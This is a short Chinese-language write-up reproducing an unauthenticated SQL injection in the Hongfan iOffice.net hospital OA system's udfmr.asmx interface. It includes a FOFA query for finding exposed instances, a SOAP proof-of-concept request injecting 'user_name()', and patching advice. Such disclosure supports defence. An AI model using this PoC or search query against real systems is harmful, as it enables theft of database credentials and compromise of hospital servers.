红帆OA SQL注入漏洞复现

0x01 产品简介 

    红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。

0x02 漏洞概述

  红帆iOffice.net udfmr.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

0x03 复现环境

FOFA:app="红帆-ioffice"

红帆OA SQL注入漏洞复现_第1张图片

 0x04 漏洞复现

http://your-ip/iOffice/prg/set/wss/udfmr.asmx?op=GetEmpSearch

红帆OA SQL注入漏洞复现_第2张图片

 出现以上这种情况则可能存在漏洞

PoC

POST /iOffice/prg/set/wss/udfmr.asmx HTTP/1.1
Host: your-ip
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/ioffice/udfmr/GetEmpSearch"



  
    
      1=user_name()
    
  

查询当前数据库用户 

红帆OA SQL注入漏洞复现_第3张图片

 0x05 修复建议

 限制访问来源地址,如非必要,不要将系统开放在互联网上。

 升级至安全版本或打补丁。

你可能感兴趣的:(漏洞复现,安全,web安全,网络安全)